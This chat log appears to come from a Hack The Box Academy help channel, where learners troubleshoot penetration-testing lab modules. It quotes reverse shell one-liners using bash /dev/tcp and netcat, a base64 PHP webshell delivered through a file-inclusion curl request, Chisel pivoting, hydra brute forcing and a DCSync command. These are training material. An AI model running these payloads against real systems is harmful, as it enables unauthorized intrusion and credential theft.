You don't need to do anything fancy

Just make sure you have all the info to move forward

If all else fails reset the lab, change vpn regions, try again

because rdping into the ||45|| should work?

I haven't touched that in a hot minute tbh

Well evidently I don't have all the info, I only have both credentials and the ip that I want to connect to, what am I missing?

You're missing the right IP

You have the right subnet

But your last octet is wrong

Thanks! I don't know why I didn't find this ip during my ping sweeps, I saw that people were talking about this ip but I just assumed the module's parameters changed

Very rarely do the parameters change

I'll remember that

Still having trouble with the File Upload Attack skill assessment, I cannot find the directory to see if they upload

Try looking at burp more

Hi all, I am doing the password mutation sub-section of password attacks and I am on the question other than using -t is there any other way to speed it up?

Not attacking ssh speeds things up

so is it purposely slow or is that a nudge?

I even removed the unnecessary users and targeted one but I have tried all open services that we got taught in the previous section, might just be a patience thing I guess

Patience is key to breaking in

At most you should only need to wait 30 minutes

Ssh is a very slow service to attack

guys if i take htb academy course for students do i need anything like powerful pc rdp vpn or anything or htb labs are comfortable & good enough?

Wdym there's no "course for students"

There's the student discount which gives you t0-2 module access

But there's no tailored "for students" path

The learning modules in academy are slightly guided and a lot of reading as opposed to the main labs which are fuck around and find out

Can I ask a question about skills assessment?

As long as you can do so without revealing spoilers

Redacting things with the first couple characters and *

Like user v* and password q*

yeah I remember watching an experienced PT on YouTube said SSH is really slow, but thanks I got the answer and learned. which is the key... thanks

I am in second question of the wifi pentesting basics module skills assessment where it asks password for something I am stuck.

yeh ive meant that

wdym main labs ?

Stuff on https://app.hackthebox.com

Htb academy modules have built in practice environments

Hi I wanted to stard lerning with Hack the box but i dont know how i connect to the starting point. I chose the Open VPN option and there i dont know how or where i need to add the File to get started. (I operate on Windows 10 )

Thnx

download openvpn client

just type openvpn windows and you will get it from there

ah

thanks a lot

Attacking GitLab

I found many users but trying any of them won't solve the question

worked thank you

you are welcome

found like 12 users but non worked

Another question

I cant have 2 gateways at the same time but i also need to conect to the VM

wdym?

To conect to Hackbox

The play machine

download the .ovpn, tranfer it to the VM and use it inside the vpn

if that is what are you asking

I send you a picture privat

if that explains my problem better

I just start using the hack the box can anyone tell me , now I'm using it for free so it's their any road map for digital forensics

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

literally used every wordlist on seclist/username

the xato 1mil is still busting tho but idk if it will find any

ok found it (was full caps of one the ones i found)

cirt

idk why they made us go through so many

Hi, who can help me with AD Enumeration & Attacks - Skills Assessment Part I?

Lots of people if you tell us what the issue is

Not to be grammar police, but "it 'Tis the season" " 'Tis" means It is. So your essentially saying it it is. 🙌 Just sayin don't come at me

I tried to run Chisel on WEB-WIN01 to get the flag.txt for this task: Submit the contents of the flag.txt file located on the Administrator's desktop on MS01.

Here is my command:
chisel server -p 8000 --reverse - Linux
.\chisel.exe client 10.10.14.179:8000 R:socks - WEB-WIN01
However, I cannot establish a connection via proxy (using proxychains with nmap on 172.16.6.50). But when I used Ligolo, everything worked fine.

Maybe the server has some blocks or restrictions in place for Chisel?

Does chisel returns a valid connection in the output?

no, bot not errors

Something like:

2024/09/28 12:01:24 client: Connected (Latency 144.6648ms)```
And:
```2024/09/28 11:01:06 server: Fingerprint 07Lt3eRpeGPYyr1qBFn0lve+jZEk+F6NcMMtxRzI0JI=
2024/09/28 11:01:06 server: Listening on http://0.0.0.0:55555
2024/09/28 11:01:24 server: session#1: tun: proxy#R:9090=>9090: Listening
2024/09/28 11:01:24 server: session#1: tun: proxy#R:9091=>9091: Listening```

Hi, new to HTB. Im having some difficulties running the attackbox in the complete beginner tutorial. There are two options; The first (located underneath the first header is the 'start machine' (in green) option that opens up the banner with the IP details.-But no VM.

The other is the attackbox option at the top of the page. This opens a VM however, when i attempt to enter the IP into the Firefox URL all im getting is error 404. What am i doing wrong here?

Wydm? What does vm have to do with firefox

sorry for my stupidity but there is an attackbox which opens Linux and there is 'start machine' that just opens a countdown and an IP. when i open the attack box it asks me to go to firefox(on linux) and enter an IP

So in short, you can’t open the url in pwnbox?

Sorry off topic but how do I get access to general?

#welcome

Yeah it says "check out modules"

Did you look anywhere above that

Yeah

Every channel says "check out modules"

Bro read the welcome channel

It says verification right there

Ah got it

got it, i needed to open both

I don't have a htb account 🥲

Make one

from linux(server) output looks the same, from client no output

I'm sorry I have no idea what all this is, I only joined to ask if its possible to know an Instagra id's location
(Just the city/country) will do.

This shouldn't count as doxxing since I'm not looking for anything more☝️

dont know, we dont help with that here

and you're making it seems like you wanna dox someone

Still not getting a response on this Limited File Uploads exercise. Used ZAP and Burp

im not sure tbh

does it work without burp and zap?

you can still do the challenge without them

How? I inspected the page to see if I could do in in browser but I am not seeing the post request

i just uploaded the file then inspected the page

hi has anyone done the introudction to windows commnad line here

someone help w assesment pls

@lime dagger check the alert

hi

what u mean

oh the alert

when i login

yea, have a look at that

try that

oh man thanks dude

it was literally there the whole time

so flags are just text we look for?

yup, seems a bit misleading since the banner prints before you log in

yes

yeh technically that isnt succesfull login

since password isnt inputted

thx tho

Have you tried the code provided from the section?

on module types of shells in getting started as part of setting up a reverse shell in linuc we are given these commands

Code: bash
bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'
Code: bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f

should we know what this is doing? i somewhat understand some of these commands and like i recognize that something is being done with an ip, and i see netcat in there. so is this causing the compromised machine to connect to our machines port 1234 and listen for commands? whats with the /tmp/f file

That was the code in the screenshot

No it's not.

whats the best data base to find newer exploits

I'd say github

do you normally search cve's and vulners results on github?

no i usually search google.. what module is this a part of?

im doing a machine and did a nmap scan but cant find exploits for the versions found through metasploit, im just learning

#boxes would be able to assist you better then, this channel is for the academy platform

i dont have access to that channel it seems

how do i get roles

read the rules and follow the directions in #welcome

Hm

I'm in the System Information module of the Linux Fundamentals module of the Information Security Foundations path, and I can't figure out how to SSH in as the user. What I don't know is what would be the IP address to login

i see, thank you

At the bottom of the page you should be able to spawn the target by clicking "Click here to spawn the target system!"

Once spawned it will show the IP address you can connect to, make sure you're using the pwnbox or connected to the VPN (not both at the same time) to ssh in.

Chat gpt can break this command down for you

For the session hijacking section of the XSS module I'm not having any payloads work. This odd because I tried the same payload earlier today and it worked? Any suggestion on what to do, and I tried the rest of their suggested payloads

Hi, is it normal for the Citrix Breakout chapter under Windows Privilege Escalation module to be very very laggy? I am following the flow -> ||rdp|| to connect into the ip address and navigating to ||http://humongousretail.com/remote/ ||, but once enter the provided credentials into the webpage I struggle to go anywhere or proceed due to the lag

Is there any way to remedy this issue? I have tried swapping to different US and EU servers but this issue seems to still be persistent.

Currently im doing this module with the provided Pwnbox in SG.

Need to see the payload

Should I DM it to you or put a spoiler warning in the chat

anyone help

yea dm

wydm did you login or its just laggy?

Use TCP VPN if you're not, more stable

logged in. the webpage is laggy

are u on the citrix windows desktop?

yup.

will try this later

it gonna be laggy but its bareable for me at least

np. i guess ill have to bear with it

the login brute forcing modul skill assessment taking forever to crack

its over

going to modify hydra so when it finishes it uses my phones alarm to wake me up

Bru what did they change about that skill assessment 😭

So many people asking about it now

Ahhhhh thank you

bro its been 50 min already just to crack the first question

gave up and used the solution

Is it worth it? The one that comes with the 1 year plan

Quick question regarding Php wrappers in the File Inclusion module:
In the question, I can't cat the flag somehow it's only printing white spaces by curl... am I missing something stupid?

can you show a picture

sure can

didn't want to spoil

Redacted for good measure

well i can't see the command you're using so hard to tell

aaaah I was a bit heavy on the red paint haha

curl -s "http://94.237.54.201:53062/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=cat+

(followed by flag name)

And I will delete message once you tell me

your command ends in cat+

so you're not catting anything

no no

followed by the flag name

I just cut it out (again not to spoil)

just put it in a spoiler tag or something

so far all i see is a command that won't work

||url -s "http://94.237.54.201:53062/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=cat+37809e2f8952f06139011994726d9ef1.txt"||

you're inputting the command into a webapp so your command needs to be url encoded, specifically the space between the cat and the file name

so :

ls+/

worked totally fine

but cat wouldn't ?

Replacing the space with %20 doesn't change anything

yeah there's a tiny bit more to it

the location of the file

oh lol

thanks, pretty stupid indeed

Sign I should go to bed.
Cheers for spotting it

Hello
Does anyone know how I can change the language of the pwnbox OS?

Keyboard layout or interface language?

You should be able to use locale -a and get the list of languages. Then you can generate the locale with locale-gen {Your Prefered Local}; export LANG={Your Prefered Local} This is temporary and you would need to do it each time. If you want the keyboard inputs changed read the man page for setxkbmap

I could be very wrong on this but i only speak one language. I don't ever mess with it. I just did a fresh install and messed with some Arch Linux so I recognize the command and the man pages are always my friend.

cant seem to remeber how to save and exit the vim on bash. tries :wq but didnt work.

press escape button first

then you should be able to do :wq

as an alternative you can use :x.

that one didnt work :/

says i need to name the file first

if you don't want to save, just do :q!

i do want to save and name the file so i can scan the list for a password. i know i know how to do it im just not grasping it right now lol

If you are trying to edit a file you do not have permission to edit you cannot save. If the file is in the /etc directory exit with :!q and then use sudo vim to edit the file

Yes! got it! i forgot i can sudo vim and create a name for the fifle after sudo vim

Module: DACL Attacks I
I'm having issues with dacledit.py
Especially having trouble creating ```
python3 -m venv .dacledit

I deactivate the env afterwards but have to always end up recloning from git for it to work.  I guess I just don't understand venv.

python3 -m venv venv then run source venv/bin/activate and when you are done then just run deactivate to exit the virtual environment. It is always good practice to just install packages in that virtual environment

after you run the python3 -m venv venv take a look at the files it creates in that directory run the tree command to see it better. The command might make sense after seeing the tree output

Yes, I run:

git clone https://github.com/ShutdownRepo/impacket -b dacledit
cd impacket/
python3 -m venv .dacledit
source .dacledit/bin/activate
python3 -m pip install .

But have been getting lots of errors on kali vm (from windows).

  'S-1-5-83-0': 'NT VIRTUAL MACHINE\Virtual Machines',

Doesn't happen on PWNBX but I just hate the lag and would like to run it on vm if possible.

Oh thanks, that's a great tip. 👍 💯

dacledit has been merged into the main branch, just install the latest version of impacket

oh great, thanks

Interface language.
I tried to use the terminal to change the locale but I wasn't able to complete the changes because I'm unable to use the dpkg-reconfigure locales command

Anyone Latino?

Hi, in the "Skills Assessment" portion of the "Information Gathering - Web Edition" module for the Pentester job path I'm given a target I can spawn (IP Address + port), a vHost (inlanefreight.htb), and a domain in the question itself (inlanefreight.com).

I'm kinda lost which is which.

just follow the question

they put the domain needed in the question

Hey

tried the following recursive commands, still no flag to be found:
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -ic -u http://94.237.54.201:50969/recursive_fuzz/FUZZ -e .html -recursion -recursion-depth 3 -v -rate 500
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -ic -u http://94.237.54.201:50969/recursive_fuzz/level1/level2/level3/FUZZ -e .html -recursion -recursion-depth 2 -rate 500
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -ic -u http://94.237.54.201:50969/recursive_fuzz/FUZZ -e html,php,aps,txt -recursion -recursion-depth 3 -v -rate 500
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -ic -u http://94.237.54.201:50969/recursive_fuzz/FUZZ -e html,php,aps,txt -recursion -v -rate 500

Mind sharing what module, etc? 🙂

web fuzzing

Section?

Recursive Fuzzing

try adding a -e.

sorry mb, u already had

try to exchange the --rate with -t X

ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -ic -u http://94.237.54.201:50969/recursive_fuzz/FUZZ -e html,php,aps,txt -recursion -v -t 100

Is the IP address in the target I'm spawning the IP address for inlanefreight.htb?

Hi all, is this the right place to leave some relatively subjective feedback on modules? I think that the Footprinting module could use some editing. The wording is sometimes confusing, but other times simply redundant. The latest example that made me come by (in https://academy.hackthebox.com/module/112/section/1075), first paragraph:

"Simple Network Management Protocol (SNMP) was created to monitor network devices. In addition, this protocol can also be used to handle configuration tasks and change settings remotely. [...] Thus, it is a protocol for monitoring and managing network devices. In addition, configuration tasks can be handled, and settings can be made remotely using this standard."

The quality of the path so far is otherwise excellent, which is also why I'm giving the feedback! Thank your for your attention

@misty saddle did not work either

try -recursion -e .php,.txt,.html -ic -t 80

Hello I keep getting blank returns during enumeration for sqlmap skill assessment. Tried various tampers however none have worked. Any help is much appreciated. Thanks

@misty saddle ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt -ic -u http://94.237.61.216:33230/recursive_fuzz/FUZZ -e .html,.php,.aps,.txt -recursion -v -t 80
Above command adds .inc

ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -ic -u http://94.237.61.216:33230/recursive_fuzz/FUZZ -e .html,.php,.aps,.txt -recursion -v -t 80

ffuf -u http://IP/recursive_fuzz/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -recursion -e .html -ic -t 80

this is the command I ran.

That command I ran to, but the index.html does not show a flag

You curl it?

like this:
curl http://ip/recursive_fuzz/level1/level2/level3/threatcon_level2/index.html

I tought that threatcon_level2 was an error in ffuf. But I see it now thx

Hello everyone I've found a password on 172.16.5.200 and I've used the password spraying technique on ad user but nothing works, am I on the right track?

https://academy.hackthebox.com/module/162/section/1572

for this section

Do I also need to add directories to /etc/hosts for me to be able to access them? I was under the impression that only domains/subdomains were to be added so that I could manualy resolve them to an IP address.

yes only domains and subomdomains, you dont need to add directories

please i stuck on last section of module Repport and Documentation i i started the pentest again i managed to get a reverse shell on 5.200 i found a password but it matches with no account ...

i don't know if i'm doing things right i've done llnmr spoofing it doesn't work on the host machine

need help with Password Attacks Lab - Medium ||im able to extract creds for all users from mysql via jason user`|| im clueless what to do next.

In the pivoting module, why is msfconsole run with proxychains? It has advanced options to configure proxy options. There is also a concern that whenever it accesses its DB on whatever port that the traffic has to go to the redirector first before coming back to the attack host making it much slower. Can anyone explain if this is not the case?

password attack modules.

Is there anyone who did Secure Coding 101: JavaScript. ? At section Encrypted Array they are losing me because my variables seem to be different after the Starting-Point bit. I have the same code as in the example, but where are they getting function _0x29f8 from?

How to get ip behind cloudflare I used censys and securitytrails but didn't work out can you tell me any techniques

What module is this for?

I have doubt I'm just asking

If this is not for a module, wrong place to ask.

Ok thank you

sry just got back, still stuck?

yes i can't find the right way i've enumerated quite a few passwords i've done password spraying on the users i've found compared to the password i've found on 5.200 and on the file shares. i've done getnpuser with asmith i have 4 users who are part of an admin group but impossible to do kerberoasting or asrep on these accounts i don't have their passwords. i'm out of ideas

Anyone completed wifi pentesting module??

i'm unblocked thanks i found someone's hash

search this channel for helpful info until someone whos done it can help

the second question in skills assessment module i am not able to solve it

finaly the hash l**_**m i found doesn't do me much good with the passthehash technique x)

the user that just deleted their msg, yall appear tow be working on the same module, no?

i basically solved all

try searching the channel for info regarding your SA until somene whos completed the module and can help comes along

or try to help each other out?

but cant read the flag

Hey any hints for second question

cant read the flag... like cant cat the flag? or its encoded? or ...?

copy paste from the modules actually

sorry not entierly sure what you're looking at but trying to be of some limited help since you're basically there

Hey i tried with aircrack-ng to get the password but I am not able to get it

read the options of aircrack

When I used a .cap file to crack using aircrack-ng it is showing that the traffic is not captured but I captured it 😕

@fading oracle can i mp you ?

show the cmd u used to capture it, plus output

copy/paste terminal output

Ok

Can I message u personally?

sure

Does sqlplus comes with pwnbox automatically?

heh if you are referring to the Oracle TNS section in the Footprinting module, I've just gone through the installation on the pwnbox myself 🙂 The provided automation script works fine though

Have you figured this out?

I've followed this installation guid because HTB doesnt have one for SQLplus
https://www.geeksforgeeks.org/how-to-install-sqlplus-on-linux/

A question about Oracle TNS page under footprinting

they have an example of finding the user & password scott:tiger, they try to login, and see that they dont have sufficient permissions.
How did they know to try and login as sysdba?
sqlplus scott/tiger@10.129.164.175/XE as sysdba

Is this a predefind role?

It's a defined role yes

sysdba is system database admin

Anyone available for some help on information gathering - web edition skills assessment? Like the rest I can't find anything

Edit: it is a weird one.

Hint: ||Use the biggest wordlist you can find.|| Not sure what they've done it like this, it's frustrating to do the right thing but not find what you're looking for because you're using a different wordlist.

Apparently there are two IP for different paths

Command Injection Skill assessment:
If the "command" I injected shows up without the output in the error, say ${LS_COLOR:10:1})...
Should I consider look for a differen point?

use the biggest word list you can find usually means rockyou.txt also check for it in the seclist dirs it may be zipped/gzipd

I mean, "biggest wordlist for the context". I don't think anyone would use rockyou on web enumeration lol

for content or vhost/subdomain?

vhost enumeration in that case

well its being reflected but not processed, did u upload your own cmd shell?

oh just use one of the ones in the seclist.../dirs/... there's one called like raft (sorry my pwnbox nor kali is open at the moment)

Yeah there's a lot but I didn't want to mention the actual wordlist and spoil the fun

cd /opt/useful/seclists; find . -type f -name "*raft*" and the 2>/dev/null trick (or whatever it is to redirect errors) for your file

ok so what are you asking a question? im a little confused here

oh i see just venting, yeah you gotta try multiple lists soemtimes

I'm not, that was supposed to be a hint for others so they don't go through the same frustration I did

I was doing the right thing but with a smaller wordlist than intended, took me about an hour to figure that out

no
I am seeking an opening that I can inject command middle of that shell exec in the skill assessment

though it'd worth to see if I can stuff a shell up

im not following can you show your request and response? are you using burp?

That one did have output if I remember correctly.

@quiet trout

I suggest you remove it and look for a different payload

aight

But you're looking in the right place

remember that cmd's are separated with cmd1;cmd2;cmd3 like file.txt;id start with something simple like that to make sure its being processed. iim not sure if i saw the output for the text file or not...`

The target IP address you're given is for inlanefreight.htb. Add it to your hosts file and go from there.

oh that was not for reading the content
but I think I kinda get where it can also go now

@wicked apex reading the content = somethigns actually being executd and ouput reflected (a sanity check)

I've just done the module haha. I wasn't sure if you figured it out meanwhile and wanted to help if needed

@cerulean grail did you get the 3rd question tho?
What is the API key in the hidden admin directory that you have discovered on the target system?
Seems bugged for me but I had it completed from before the update and I was able to just complete the module by doing the last one. I got the admin directory, but it redirects to port 80 that is closed

Do I need a certain rank in discord to post to general?

no just verify your account

````/verify ```

Verify what account? I have never used discord before.

My HTB account? Discord?

#welcome

HTB account

Am I allowed to ask questions with partial answers to the module on the forums?

Yeah I did that question. I think the whole module is bugged tbh. Currently working on question 4 - I think I have it down but as I said the module's bugged so I can't actually complete it.

I had to give it a few tries until it finally gave way to the correct port too. It's very frustrating because it's a learning experience but so many technicalities make you doubt the direction you're in even if its the right one.

Oh I just skipped question 4, but yeah, I didn't get any emails either

I feel the same as you on this, it's frustrating going in the right direction but missing things

Hi there, In the SQLMap essentials module skill assessment, what is the web application protection that has been applied and what is the command we can use to bypass that?

i just completed the login brute forcing module except one question of self assessment I basic auth +0 one , i have been running

hydra -l basic-auth-user -P 2023-200_most_used_passwords.txt <IP> -s <PORT> http-get -t 16

but it aint working

i didn't run in any other problem

but i cant get my head around this problem , any help will be appreciated thankyou

i tried medusa too even it didnt work

In your command, you need to also include the username wordlist. You also need to find the username using the given username wordlist. The provided username "basic-auth-user" is incorrect in this task.

but that username wordlist gives out diff credentials which are used for the 2nd part of the question i believe

or maybe lemme try that again gimme a sec

You will be provided with different credentials after solving the assessment 1 and logging in.

i completed that and also completed assessment 2

people also getting this vhost spitting out EVERY url?

Hi there, In the SQLMap essentials module skill assessment, what is the web application protection that has been applied and what is the command we can use to bypass that?

ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://admin.academy.htb:redacted/admin/admin.php?FUZZ=key -fs 900

but it should only spit out 1 item

• 0 Using what you learned in this section, run a parameter fuzzing scan on this page. what is the parameter accepted by this webpage?

can you please check DM ?

nvm i had the pass all along

thankyou

nvm got it

Hi there, In the SQLMap essentials module skill assessment, what is the web application protection that has been applied and what is the command we can use to bypass that?

can anyone help me with the Patch on Secure Coding 101: JavaScript SA?

Algum BR?

Hi there, in the skills assessment section in SQLMap essentials module, when I used SQLMap, it showed that the "id" parameter was vulnerable but when I tried to dump the databases, it showed that it cannot retrieve the data.

Can anyone help me with the above question?

https://academy.hackthebox.com/module/77/section/726
"do_connect: Connection to 10.129.211.239 failed (Error NT_STATUS_IO_TIMEOUT)"

Why am I getting this error?

I typed smbclient -U bob \\\\10.129.211.239\\users

People have stated this is caused by the firewall blocking the connection but don't explain how to fix that...

hey guys anyone who already did the attacking common services easy lab?

i have a question about it

🙋‍♂️

You may want to filter by 798 and not 900.

Does anyone know how I could bypass the protection of a website using Cloudflare using curl as a request?

ModuleNotFoundError: No module named 'Helper'

I left some good hints in the forum

I've got a quick question im trying to do the network module and it gives me the following question: Split the network 10.200.20.0/27 into 4 subnets and submit the broadcast address of the 2nd subnet as the answer. I am thinking that this would be 10.200.20.127 but it always tells me that its wrong now i do not know what the mistake is and what did i get wrong?

yeah took me a while to realise

hey guys when you are doing XSS and steal admin cookie. Is there any other way to use it except with Cookie-editor that gives me this error 'First-Party Isolation is enabled, but the required 'firstPartyDomain' attribute was not set.' and it doesnt work?

Module - Active Directory Enumeration & Attacks
Section - Attacking Domain Trusts - Child -> Parent Trusts - from Linux

I am presented with this issue, I am supposed to perform DCSync with secretsdump.py, which is fine.

I want to do the following:

secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt

I'm being asked for a password, I've tried the one given in the questions instruction and tried to change htb-student_adm to htb-student, with the same password, no luck.

[-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)

Checked my identity in the AD with id and this is the output

uid=1001(htb-student) gid=1002(htb-student) groups=1002(htb-student),27(sudo),112(ssl-cert)

So I'm pretty sure that I'm supposed to use htb-student to authenticate, no idea about the password, any clues?

@stable swift what section is it exactly?

developer tools bro

yeah I know you can use developer tool but in this case I cant. I am on Web Enumeration & Exploitation in Attacking Enterprise Networks and got the cookie but somehow I still cant log in to the support/admin portal

didnt they give u the credentials last section?

dm a screenshot

why does my vpn file not work? sometimes im able to connect right away, but more often than not the terminal i run the file ends up looping through the same things

necro thread but have you found the answer to this? I just did the module and got the file after many tries with different wordlists and came to search if anyone had encountered the same

What is the passowrd to the target machine?

https://academy.hackthebox.com/module/77/section/726

wym

for bob?

i did sudo ssh ACADEMY-GETSTART-SVCSCAN@10.129.83.163

the SMB password for Bob is Welcome1, but what is the target machine password?

why do u need to ssh in?

I don't know. A previous exercise made you do that.

none of the question say anything about ssh

ok but now i get a different error when i do sudo smbclient -U bob \\\\10.129.83.163

Not enough '\' characters in service

you didnt specify a share

@naive sage Page 7 "Navigation"

ok so I added \users to the end of it... how do you open or read the flag.txt file?

did you ssh first?

just download it

like ftp (get)

gave me a NT_STATUS_IO_TIMEOUT after get flag.txt

Never mind it looks like it downloaded it "getting file \flag\flag.txt of size 33 as flag.txt

But what directory did it download to?

I totally forgot about needing to do that 😅

@safe star All I did was "Start Instance"

never mind it saved to home

ssh into the machine

from my understanding of the section, a reverse shell is great because its quick and easy to run. but at least in terms of execution setting up a bind shell is just as easy, so where does a reverse get its "quick and easy"

Sweet jesus, just tried them, thanks a lot man.

They’re kinda the same thing if you really think about it, but i think it would be a little simpler just to make the victim send a connection instead of listening

And reverse shells don’t have to worry about getting blocked by inbound rules

Hi, anyone have the exprience about the .vbs revershell

I try to create the custom .vbs revershell but not success

please suggest, thank you!

What module?

Have u tried running a powershell command in vbs

└──╼ $nc -lvp 4444
listening on [any] 4444 ...
connect to [192.168.45.171] from manageengine [192.168.106.113] 49365
I tried revershell but the result is like this, it doesn't generate revershell.

I try to run reversehll from windows machine to my parrot linux machine but not succcess

What module

This is from web-300

Just wait for a response in web-300

This has nothing to do with HTB academy modules

@analog dock Do I have to wait long because I waited about 10 seconds and the result was just like above, no revershell was generated

Read above

even when i create custom reverse shell using .vba for testing

Read above

yes

euhm I'm sure this is a bit of a stupid question but I'm in the nmap module and the question is Enumerate the hostname of your target and submit it as the answer. (case-sensitive) sooo I do enumerate the hosts with the /24 mask but I'm not sure that's really what they're asking. I guess I'm not sure I understand what I need to find here.

thsi is the nmap module so I'm sure there is no fuzzing needed x)

hi guys

i need some guidance on my hacking journey

how can i chat in general?

i need some help

Didn’t they give you a target?

#welcome

oh yeah I'm vpn connected to the target but I'm just confused as to what they want me to do here x)

speak your mind

are u an experienced "hacker"/programer

kk i wont to take cuber

oh no I'm a bad hacker but a good software engineer

** cyber **

Just scan the machine and one of the services should expose the hostname

i wish i had the patience to be one :()

if you want to continue general chatting, please move to #general

kk its my first year in the university but finding it difficult, so a friend told me to join this "hack the box"

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

if i send a video, are someone able to see the location where the picture was taken?

Alright, I'll poke at it with an agressive scan and service scan maybe I missed something in my formatting string for the output

I am stuck at broken authentication Authentication Bypass via Parameter Modification can someone please let me know what im doing wrong ffuf -w ./id.txt -u "http://83.136.252.126:42381/admin.php?user_id=FUZZ" -b "PHPSESSID=bjqe4go3cofep0j1qdi5ora632" -fr "Could not load admin data. Please check your privileges."

thanks I had a formatting string for the output and euhm... I was the problem of course

someone pls help me chatting in the gerenal i need some off topic help

read this channel #welcome

its fine it cant work

where do i start as a "ethical" hacker

I would recommend the HTB Academy tbh

you can do the fundamentals there 🙂

thanks, im 17 is it too late to learn that

a lot of people are learning it in their late 30s and 40s so you're ahead of the curve

wow does it cost money to join the HTB

there are some things you can do for free. Start by getting an account and following this channel #welcome you will have access to the rest

you need to be 18+ to join HTB

ohh thats why

oops didn't know, thank for the catch

perhaps chatgpt can give me a good groundstand

I started last year at 17, 18 now

how it the progress going. is it easy to underdtand and try out?

i can learn new things easier since i got the foundations down, but its not easy in the beginning at all tbh

not a big deal if you really like it tho, will just keep coming back

how did u start and where

gotta move this to #general

okay but dont have permission to chat

#welcome

doesnt work

please follow the directions in #welcome to gain access to most channels.

i dont have a HTP acc because im not 18

register an account, then fill out the parental consent form

https://help.hackthebox.com/en/articles/9456556-parental-consent-and-approval-for-users-under-18